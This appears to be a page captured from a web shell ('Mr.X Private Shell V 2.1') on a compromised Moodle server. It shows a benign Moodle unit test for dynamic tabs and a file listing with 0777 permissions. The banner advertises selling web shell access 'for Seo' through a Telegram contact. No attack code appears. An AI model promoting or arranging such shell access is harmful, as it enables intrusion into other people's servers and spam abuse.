__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
declare(strict_types=1);
namespace core\external;
use core_external\external_api;
defined('MOODLE_INTERNAL') || die();
global $CFG;
require_once($CFG->dirroot . '/webservice/tests/helpers.php');
require_once($CFG->dirroot . '/lib/tests/fixtures/testeable_dynamic_tab.php');
/**
* Unit tests external dynamic tabs get content
*
* @package core
* @covers \core\external\dynamic_tabs_get_content
* @copyright 2021 David Matamoros <davidmc@moodle.com>
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
final class dynamic_tabs_get_content_test extends \externallib_advanced_testcase {
/**
* Text execute method
*/
public function test_execute(): void {
$this->resetAfterTest();
$this->setAdminUser();
$result = dynamic_tabs_get_content::execute(testeable_dynamic_tab::class, json_encode([]));
$result = external_api::clean_returnvalue(dynamic_tabs_get_content::execute_returns(), $result);
$this->assertEquals('templates/tabs/mytab', $result['template']);
$this->assertEquals(json_encode(['content' => get_string('content')]), $result['content']);
$this->assertNotEmpty($result['javascript']);
$this->assertStringStartsWith('<script>', $result['javascript']);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| check | Folder | 0777 |
|
|
| output | Folder | 0777 |
|
|
| dynamic_tabs_get_content_test.php | File | 1.94 KB | 0777 |
|
| moodlenet_auth_check_test.php | File | 3.34 KB | 0777 |
|
| moodlenet_get_share_info_activity_test.php | File | 7 KB | 0777 |
|
| moodlenet_get_shared_course_info_test.php | File | 4.43 KB | 0777 |
|
| moodlenet_send_activity_test.php | File | 7.08 KB | 0777 |
|
| moodlenet_send_course_test.php | File | 7.32 KB | 0777 |
|
| record_userfeedback_action_test.php | File | 2.75 KB | 0777 |
|